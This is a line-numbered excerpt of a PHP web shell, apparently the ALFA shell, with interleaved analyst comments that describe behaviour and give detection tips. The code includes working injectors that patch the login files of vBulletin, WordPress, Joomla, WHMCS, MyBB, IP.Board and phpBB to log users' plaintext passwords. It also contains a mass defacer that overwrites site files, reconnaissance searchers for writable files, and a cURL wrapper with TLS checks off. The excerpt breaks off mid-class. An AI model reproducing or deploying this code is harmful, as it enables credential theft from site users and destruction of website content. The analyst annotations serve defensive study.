  5744. AlfaNum(5,6,7,8,9,10);
  5745. echo '<div class=header><br>
  5746. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
  5747. <div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
        // Keys are the identifiers alfaHijackCms() switches on; values are display labels.
  5748. $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
  5749. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
  5750. echo("</select>");
  5751. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
  5752. SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
  5753. <input type="submit" name="btn" value=" "></form></center><br>';
        // The POST keys are read without isset(); on a plain page view they are simply unset.
  5754. $cms = $_POST['alfa1'];
  5755. $saveto = $_POST['alfa2'];
  5756. $cmspath = $_POST['alfa4'];
  5757. if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
  5758. echo __pre();
  5759. alfaHijackCms($cms,$cmspath,$saveto);
  5760. }
  5761. echo '</div>';
  5762. alfafooter();
  5763. }
  5764. function alfaHijackCms($cms,$cmspath,$saveto){
        // Analyst note: dispatcher that maps the CMS identifier from the form to the matching
        // injector. $cmspath is the CMS install directory and $saveto the credential log path;
        // both are passed through unchanged. An unknown identifier only prints "error!".
  5765. switch($cms){
  5766. case "vb":
  5767. hijackvBulletin($cmspath,$saveto);
  5768. break;
  5769. case "wp":
  5770. hijackwp($cmspath,$saveto);
  5771. break;
  5772. case "jom":
  5773. hijackJoomla($cmspath,$saveto);
  5774. break;
  5775. case "whmcs":
  5776. hijackWhmcs($cmspath,$saveto);
  5777. break;
  5778. case "mybb":
  5779. hijackMybb($cmspath,$saveto);
  5780. break;
  5781. case "ipb":
  5782. hijackIPB($cmspath,$saveto);
  5783. break;
  5784. case "phpbb":
  5785. hijackPHPBB($cmspath,$saveto);
  5786. break;
  5787. default:
  5788. echo "error!";
  5789. break;
  5790. }
  5791. }
  5792. function hijackvBulletin($path,$saveto){
        // Analyst note: patches two files of a vBulletin install under $path:
        //   - login.php: the logging snippet in $code is inserted in front of 'do_login_redirect();'
        //   - includes/class_bootstrap.php: "defined('DISABLE_PASSWORD_CLEARING')" is replaced by "true"
        //     (presumably so the plaintext password is still present at login time - TODO confirm).
        // The snippet appends "username : password (email)" lines to $saveto and de-duplicates the file.
        // Both files must exist, be writable and contain their anchor string, otherwise nothing is changed.
        // Defender checks: compare both files against the vendor release, search them for the
        // '$alfa_file' marker, and rotate credentials of accounts that logged in after the change.
  5793. $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5794. $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
        // The log path is substituted into the snippet as a string literal.
  5795. $code=str_replace('{saveto_path}',$saveto,$code);
  5796. $login = $path."/login.php";
  5797. $class = $path."/includes/class_bootstrap.php";
  5798. $dologin = 'do_login_redirect();';
  5799. $evil_login = "\t".$code."\n\t".$dologin;
  5800. $evil_class = "true";
  5801. if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
  5802. $data_login = @file_get_contents($login);
  5803. $data_class = @file_get_contents($class);
  5804. if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
        // str_replace() rewrites every occurrence of the anchor, not just the first.
  5805. $login_replace = str_replace($dologin,$evil_login, $data_login);
  5806. $class_replace = str_replace($clearpw,$evil_class, $data_class);
  5807. @file_put_contents($login, $login_replace);
  5808. @file_put_contents($class, $class_replace);
  5809. hijackOutput(0,$saveto);
  5810. }else{
  5811. hijackOutput(1);
  5812. }
  5813. }else{
  5814. hijackOutput(1);
  5815. }
  5816. }
  5817. function hijackwp($path,$saveto){
        // Analyst note: patches <path>/wp-login.php. The logging snippet in $code is inserted
        // directly after the line 'if ( !is_wp_error($user) && !$reauth ) {', i.e. inside the
        // branch taken when that check passes, and appends "log : pwd (user_email)" to $saveto,
        // then de-duplicates the log file.
        // Defender checks: verify wp-login.php against the core checksum for the installed version,
        // search it for '$alfa_file', and reset passwords of users who logged in after the change.
  5818. $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5819. $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
  5820. $code=str_replace('{saveto_path}',$saveto,$code);
  5821. $login=$path."/wp-login.php";
  5822. $evil_login = "\t".$redirect_wp."\n\t".$code;
        // Nothing is written unless the file exists, is writable and contains the anchor line.
  5823. if(@is_file($login) AND @is_writable($login)){
  5824. $data_login = @file_get_contents($login);
  5825. if(strstr($data_login, $redirect_wp)){
  5826. $login_replace = str_replace($redirect_wp,$evil_login, $data_login);
  5827. @file_put_contents($login, $login_replace);
  5828. hijackOutput(0,$saveto);
  5829. }else{
  5830. hijackOutput(1);
  5831. }
  5832. }else{
  5833. hijackOutput(1);
  5834. }
  5835. }
  5836. function hijackJoomla($path,$saveto){
        // Analyst note: prepends a complete <?php ... ?> block to the Joomla administrator login
        // component (login.php, or admin.login.php if the former is absent) under
        // <path>/administrator/components/com_login/. The block authenticates the posted
        // username/passwd through JAuthentication and, when the response status is 1, appends
        // "username:passwd ( email )" to $saveto and de-duplicates the log.
        // Unlike the anchor-based injectors there is no marker check: the file only has to exist
        // and be writable. Defender checks: the component file should start with the vendor's
        // own header; search it for '$Alfa_auth' / '$alfa_file'.
  5837. $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
  5838. $code=str_replace('{saveto_path}',$saveto,$code);
  5839. $comp=$path."/administrator/components/com_login/";
        // Picks whichever of the two candidate file names exists; '' means neither was found.
  5840. if(@is_file($comp."/login.php")){
  5841. $login = $comp."/login.php";
  5842. }elseif(@is_file($comp."/admin.login.php")){
  5843. $login = $comp."/admin.login.php";
  5844. }else{
  5845. $login = '';
  5846. }
  5847. if(@is_file($login) AND @is_writable($login) AND $login != ''){
  5848. $data_login = @file_get_contents($login);
  5849. $evil_login = $code."\n".$data_login;
  5850. @file_put_contents($login, $evil_login);
  5851. hijackOutput(0,$saveto);
  5852. }else{
  5853. hijackOutput(1);
  5854. }
  5855. }
  5856. function hijackWhmcs($path,$saveto){
        // Analyst note: appends a <?php ... ?> block to <path>/configuration.php of a WHMCS install.
        // On any request that posts 'username' and 'password', the block opens its own mysqli
        // connection with the $db_* values defined in that configuration file, checks the posted
        // credentials against tbladmins (when 'language' is posted) or tblclients, and on a match
        // appends "username : password (email) : is_admin|is_user" to $saveto, then de-duplicates.
        // Defender checks: configuration.php should contain only settings; any trailing code after
        // the vendor's content is a strong indicator. Rotate admin and client credentials.
  5857. $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
  5858. $code=str_replace('{saveto_path}',$saveto,$code);
  5859. $conf=$path."/configuration.php";
  5860. if(@is_file($conf) AND @is_writable($conf)){
  5861. $data_conf = @file_get_contents($conf);
        // If the config has no closing tag, one is emitted first so the appended block's own
        // opening tag is not nested inside the existing PHP section.
  5862. if(!strstr($data_conf,'?>'))$code = '?>'.$code;
  5863. $evil_conf = $data_conf."\n".$code;
  5864. @file_put_contents($conf, $evil_conf);
  5865. hijackOutput(0,$saveto);
  5866. }else{
  5867. hijackOutput(1);
  5868. }
  5869. }
  5870. function hijackMybb($path,$saveto){
        // Analyst note: patches <path>/member.php of a MyBB install. The snippet in $code is
        // inserted in front of '$loginhandler->complete_login();'; it looks up the user's e-mail
        // in the users table and appends "username : password ( email )" to $saveto, then
        // de-duplicates the log.
        // Defender checks: diff member.php against the vendor release and search it for
        // '$alfa_file'; reset passwords for accounts that logged in after the modification.
  5871. $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
  5872. $find = '$loginhandler->complete_login();';
  5873. $code=str_replace('{saveto_path}',$saveto,$code);
  5874. $login=$path."/member.php";
  5875. $evil_login = "\t".$code."\n\t".$find;
        // Nothing is written unless the file exists, is writable and contains the anchor call.
  5876. if(@is_file($login) AND @is_writable($login)){
  5877. $data_login = @file_get_contents($login);
  5878. if(strstr($data_login, $find)){
  5879. $login_replace = str_replace($find,$evil_login, $data_login);
  5880. @file_put_contents($login, $login_replace);
  5881. hijackOutput(0,$saveto);
  5882. }else{
  5883. hijackOutput(1);
  5884. }
  5885. }else{
  5886. hijackOutput(1);
  5887. }
  5888. }
  5889. function hijackIPB($path,$saveto){
        // Analyst note: patches <path>/admin/sources/handlers/han_login.php of an IP.Board install.
        // The snippet in $code is inserted right after "unset( $member['plainPassword'] );" and
        // appends "ips_username : ips_password ( email )" from the POST data to $saveto, then
        // de-duplicates the log.
        // Defender checks: diff han_login.php against the vendor release and search it for
        // '$Alfa_file'; reset passwords for accounts that logged in after the modification.
  5890. $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5891. $find = 'unset( $member[\'plainPassword\'] );';
  5892. $code=str_replace('{saveto_path}',$saveto,$code);
  5893. $login=$path."/admin/sources/handlers/han_login.php";
  5894. $evil_login = "\t".$find."\n\t".$code;
        // Nothing is written unless the file exists, is writable and contains the anchor statement.
  5895. if(@is_file($login) AND @is_writable($login)){
  5896. $data_login = @file_get_contents($login);
  5897. if(strstr($data_login, $find)){
  5898. $login_replace = str_replace($find,$evil_login, $data_login);
  5899. @file_put_contents($login, $login_replace);
  5900. hijackOutput(0,$saveto);
  5901. }else{
  5902. hijackOutput(1);
  5903. }
  5904. }else{
  5905. hijackOutput(1);
  5906. }
  5907. }
  5908. function hijackPHPBB($path,$saveto){
        // Analyst note: patches <path>/ucp.php of a phpBB install. The snippet in $code is inserted
        // right after "case 'login':"; it reads username/password via request_var(), calls
        // $auth->login() itself and, on LOGIN_SUCCESS, appends "username : password ( user_email )"
        // to $saveto, then de-duplicates the log.
        // Defender checks: diff ucp.php against the vendor release and search it for '$Alfa_file';
        // reset passwords for accounts that logged in after the modification.
  5909. $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5910. $find = 'case \'login\':';
  5911. $code=str_replace('{saveto_path}',$saveto,$code);
  5912. $login=$path."/ucp.php";
  5913. $evil_login = "\t".$find."\n\t".$code;
        // Nothing is written unless the file exists, is writable and contains the anchor label.
  5914. if(@is_file($login) AND @is_writable($login)){
  5915. $data_login = @file_get_contents($login);
  5916. if(strstr($data_login, $find)){
  5917. $login_replace = str_replace($find,$evil_login, $data_login);
  5918. @file_put_contents($login, $login_replace);
  5919. hijackOutput(0,$saveto);
  5920. }else{
  5921. hijackOutput(1);
  5922. }
  5923. }else{
  5924. hijackOutput(1);
  5925. }
  5926. }
  5927. function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');} // Analyst note: status line for the injectors; $c == 0 prints success with the log path $p (echoed unescaped), anything else the error text.
  5928. function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
        // Analyst note: recursive search below $dir. With $e == 'str' every candidate file is read
        // in full and its path echoed when it contains $string; otherwise the file name itself is
        // matched. $ext limits the candidates by extension ('*' = all). Matches are only echoed;
        // the function returns nothing and the collected $results list is not used by callers.
        // On a live host this shows up as the web-server process reading large parts of the tree.
  5929. if(@is_dir($dir)){
  5930. $files=@scandir($dir);
  5931. foreach($files as $key => $value){
  5932. $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
  5933. if(!@is_dir($path)){
        // Extension filter: compares the text after the last dot with $ext.
  5934. if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
  5935. if($e=='str'){
  5936. $content = @file_get_contents($path);
  5937. if(strpos($content, $string) !== false){
  5938. echo str_replace('\\','/',$path) . "<br>";
  5939. }
  5940. }else{
  5941. if(strstr($value,$string)){
  5942. echo str_replace('\\','/',$path) . "<br>";
  5943. }
  5944. }
  5945. $results[] = $path;
  5946. }elseif($value != "." && $value != "..") {
        // Descend into sub-directories, skipping the '.' and '..' entries.
  5947. Alfa_StrSearcher($path,$string,$ext,$e,$results);
  5948. $results[] = $path;
  5949. }}}}
  5950. function alfasearcher(){
        // Analyst note: "Searcher" panel with two modes selected by alfa1:
        //   'file' - lists writable files, writable directories or all files via Alfa_Searcher()
        //   'str'  - finds files by name or by content via Alfa_StrSearcher()
        // Directory, extension and search string all come from $_POST and are echoed or used
        // without validation. Both modes are reconnaissance of the host's file system.
  5951. alfahead();
  5952. echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
  5953. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
  5954. echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
  5955. <div class="txtfont">
  5956. Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
  5957. Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
  5958. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5959. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5960. $dir = $_POST['alfa2'];
  5961. $ext = $_POST['alfa3'];
  5962. $method = $_POST['alfa4'];
  5963. if($_POST['alfa5']=='>>'){
  5964. echo __pre();
        // A trailing slash is dropped because Alfa_Searcher() builds its glob patterns as "$dir/*".
  5965. if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
  5966. Alfa_Searcher($dir,trim($ext),$method);
  5967. }
  5968. }
        // Unlike the 'file' branch, this comparison reads alfa1 without an isset() guard.
  5969. if($_POST['alfa1']=='str'){
  5970. echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
  5971. <div class="txtfont">
  5972. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
  5973. String: <input type="text" name="string" value="">
  5974. Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
  5975. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5976. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5977. $dir = $_POST['alfa2'];
  5978. $string = $_POST['alfa3'];
  5979. $ext = $_POST['alfa5'];
  5980. if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
  5981. echo __pre();
        // alfa6 carries the method select ('name' or 'str') and is passed on as the match mode.
  5982. Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
  5983. }
  5984. }
  5985. echo '</div>';
  5986. alfafooter();
  5987. }
  5988. function alfaMassDefacer(){
        // Analyst note: "Mass Defacer" panel. Overwrites files below a request-supplied directory
        // (alfa1) with the contents of a request-supplied page (alfa2); alfa3 selects 'index'
        // (only well-known index file names) or 'all' (every writable file).
        // This is destructive: original contents are not kept. Detection and recovery rely on
        // file-integrity monitoring (many files suddenly sharing one hash and mtime) and on
        // backups taken before the modification.
  5989. alfahead();
  5990. AlfaNum(5,6,7,8,9,10);
  5991. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
  5992. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
  5993.     Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  5994.     DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
  5995. </form>';
  5996. $dir = $_POST['alfa1'];
  5997. $defpage = $_POST['alfa2'];
  5998. $method = $_POST['alfa3'];
        // Path of the shell itself; used below so that the shell does not overwrite its own file.
  5999. $fCurrent = $GLOBALS['__file_path'];
  6000. if($_POST['alfa4'] == '>>'){
  6001. if(!empty($dir)){
  6002. if(@is_dir($dir)){
  6003. if(@is_readable($dir)){
  6004. if(@is_file($defpage)){
  6005. if($dh = @opendir($dir)){
  6006. echo __pre();
  6007. while (($file = @readdir($dh)) !== false){
  6008. if($file == '..' || $file == '.')continue;
        // No separator is inserted here, so $dir is expected to end with a slash.
  6009. $newfile=$dir.$file;
  6010. if($fCurrent == $newfile)continue;
  6011. if(@is_dir($newfile)){
  6012. Alfa_ReadDir($newfile,$method,$defpage);
  6013. }else{
  6014. if(!@is_writable($newfile))continue;
  6015. if(!@is_readable($newfile))continue;
  6016. Alfa_Rewriter($newfile,$file,$defpage,$method);
  6017. }
  6018. }
  6019. closedir($dh);
  6020. }else{__alert('<font color="red">Error In OpenDir...</font>');}
  6021. }else{__alert('<font color="red">DefPage File NotFound...</font>');}
  6022. }else{__alert('<font color="red">Directory is not Readable...</font>');}
  6023. }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
  6024. }else{__alert('<font color="red">Dir is Empty...</font>');}
  6025. }
  6026. echo '</div>';
  6027. alfafooter();
  6028. }
  6029. function Alfa_ReadDir($dir,$method='',$defpage=''){
        // Analyst note: recursive directory walk used by the mass-defacer. Every readable regular
        // file found below $dir is handed to Alfa_Rewriter() together with the replacement page
        // path and the method ('index' or 'all'). Returns false for an unreadable $dir, otherwise
        // nothing.
  6030. if(!@is_readable($dir)) return false;
  6031. if (@is_dir($dir)) {
  6032. if ($dh = @opendir($dir)) {
  6033. while(($file=readdir($dh))!==false) {
  6034. if($file == '..' || $file == '.')continue;
  6035. $newfile=$dir.'/'.$file;
        // Sub-directories are processed first by recursion; files fall through to the rewriter.
  6036. if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
  6037. if(@is_file($newfile)){
  6038. if(!@is_readable($newfile))continue;
  6039. Alfa_Rewriter($newfile,$file,$defpage,$method);
  6040. }
  6041. }
  6042. closedir($dh);
  6043. }
  6044. }
  6045. }
  6046. function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
        // Analyst note: overwrites one file. Despite its name, $dir is the full path of the target
        // file and $file its base name; $defpage is the path of the replacement page, which is
        // re-read from disk on every call. In 'index' mode only the listed index/default file
        // names are replaced, in 'all' mode every file passed in. Original contents are lost.
  6047. if(!@is_writable($dir)) return false;
  6048. if(!@is_readable($dir)) return false;
  6049. $defpage=@file_get_contents($defpage);
  6050. if($m == 'index'){
        // File names treated as site entry points; compared case-insensitively via strtolower().
  6051. $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
  6052. if(in_array(strtolower($file),$indexs)){
  6053. @file_put_contents($dir,$defpage);
  6054. echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
  6055. }
  6056. }elseif($m=='all'){
  6057. @file_put_contents($dir,$defpage);
  6058. echo @is_file($dir)?$dir."  <b><font color='red'>DeFaced...</b></font><br>" : '';
  6059. }
  6060. }
  6061. function alfaGetDisFunc(){
        // Analyst note: prints the PHP 'disable_functions' ini value as an HTML table, one row per
        // unique entry, each linked to its php.net manual page. This is environment reconnaissance:
        // it tells the operator which hardening the host applies.
  6062. alfahead();
  6063. echo '<div class="header">';
  6064. $disfun = @ini_get('disable_functions');
  6065. $s = explode(',',$disfun);
  6066. $f = array_unique($s);
  6067. echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
  6068. $i=1;
  6069. foreach($f as $s){
  6070. $s=trim($s);
        // Entries are skipped when function_exists() is true or is_callable() is false for the name.
  6071. if(function_exists($s)||!is_callable($s))continue;
  6072. echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
  6073. echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
  6074. $i++;
  6075. }
  6076. echo '</table></center>';
  6077. echo '</div>';
  6078. alfafooter();
  6079. }
  6080. function Alfa_Create_A_Tag($action,$vals){
        // Analyst note: UI helper that echoes one menu link per entry of $vals. Each link calls the
        // shell's client-side g() dispatcher with $action, followed by ($val[1] - 1) literal
        // 'null' arguments and then $val[0] as the final argument; $key is the link label.
        // Values are concatenated into the onclick attribute without escaping.
  6081. $nulls = array();
  6082. foreach($vals as $key => $val){
  6083. echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
  6084. for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
  6085. $f = implode(',',$nulls);
  6086. echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
        // Reset the padding list so the next link starts from an empty list.
  6087. unset($nulls);
  6088. }
  6089. }
  6090. function Alfa_Searcher($dir, $ext, $method) {
        // Analyst note: recursive glob-based listing below $dir. $method selects the report:
        //   'files' - files matching *.$ext that are writable
        //   'dirs'  - directories (of matched files) that are writable, each printed once per call
        //   'all'   - every matched file
        // Sub-directories are processed before the current level. Output is echoed; nothing is
        // returned. Writable locations are what an intruder needs for persistence, so the same
        // listing is useful to a defender tightening permissions under the web root.
  6091. if(@is_readable($dir)){
        // For 'all' and 'dirs' the extension filter is widened to every extension.
  6092. if($method == 'all')$ext = '*';
  6093. if($method == 'dirs')$ext = '*';
  6094. $globFiles = @glob("$dir/*.$ext");
  6095. $globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
  6096. $blacklist = array();
  6097. foreach ($globDirs as $dir) {
  6098. if(!@is_readable($dir)) continue;
  6099. @Alfa_Searcher($dir, $ext, $method);
  6100. }
  6101. switch($method){
  6102. case "files":
  6103. foreach ($globFiles as $file){
  6104. if(@is_writable($file)){
  6105. echo "$file<br>";
  6106. }
  6107. }
  6108. break;
  6109. case "dirs":
  6110. foreach ($globFiles as $file){
        // $blacklist holds directories already printed during this call.
  6111. if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
  6112. echo dirname($file).'<br>';
  6113. $blacklist[] = dirname($file);
  6114. }
  6115. }
  6116. break;
  6117. case "all":
  6118. foreach ($globFiles as $file){
  6119. echo $file.'<br>';
  6120. }
  6121. break;
  6122. }
  6123. unset($blacklist);
  6124. }
  6125. }
  6126. function AlfaiFrameCreator($f,$width='100%',$height='600px'){
        // Analyst note: returns an <iframe> element for URL $f with the given dimensions.
        // All three values are concatenated into attributes without escaping.
  6127. return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
  6128. }
  6129. class AlfaCURL {
        // Analyst note: thin cURL wrapper the shell uses for outbound HTTP(S) requests.
        // Indicators visible in this class that can be matched on a host or at a proxy:
        //   - fixed User-Agent string (MSIE 7.0 / Windows NT 5.1 / Media Center PC 4.0)
        //   - cookie jar file ALFA_TEMPDIR/Alfa_cookies.txt (ALFA_TEMPDIR is defined elsewhere)
        //   - certificate and host-name verification switched off whenever $ssl is true
        // Request headers sent with every call.
  6130. public $headers;
        // User-Agent header value.
  6131. public $user_agent;
        // Value passed to CURLOPT_ENCODING.
  6132. public $compression;
        // Path of the cookie file set by cookie().
  6133. public $cookie_file;
        // Optional proxy passed to CURLOPT_PROXY.
  6134. public $proxy;
        // Cookie jar path used by Send().
  6135. public $path;
        // When true, Send() disables TLS peer and host verification.
  6136. public $ssl = false;
        // Checked by Send(); requests are refused when this is false.
  6137. public $curl_status = true;
  6138. function __construct($cookies=false,$compression='gzip',$proxy=''){
        // Sets default headers, User-Agent, cookie jar path, compression and proxy.
        // Returns early when the curl extension is not loaded.
  6139. if(!extension_loaded('curl')){$curl_status = false;return false;}
  6140. $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
  6141. $this->headers[] = 'Connection: Keep-Alive';
  6142. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
  6143. $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
  6144. $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
  6145. $this->compression=$compression;
  6146. $this->proxy=$proxy;
  6147. $this->cookies=$cookies;
  6148. if($this->cookies)$this->cookie($this->path);
  6149. }
  6150. function cookie($cookie_file) {
        // Records the cookie file path, creating an empty file first when
        // _alfa_file_exists() (defined elsewhere) reports that it is missing.
  6151. if (_alfa_file_exists($cookie_file,false)) {
  6152. $this->cookie_file=$cookie_file;
  6153. }else{
  6154. @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
  6155. $this->cookie_file=$cookie_file;
  6156. @fclose($this->cookie_file);
  6157. }
  6158. }
  6159. function Send($url,$method="get",$data=""){
        // Performs one request to $url and returns the response body (curl_exec() result).
        // $method 'post' sends $data as the form body; anything else is a GET. 30 s timeout.
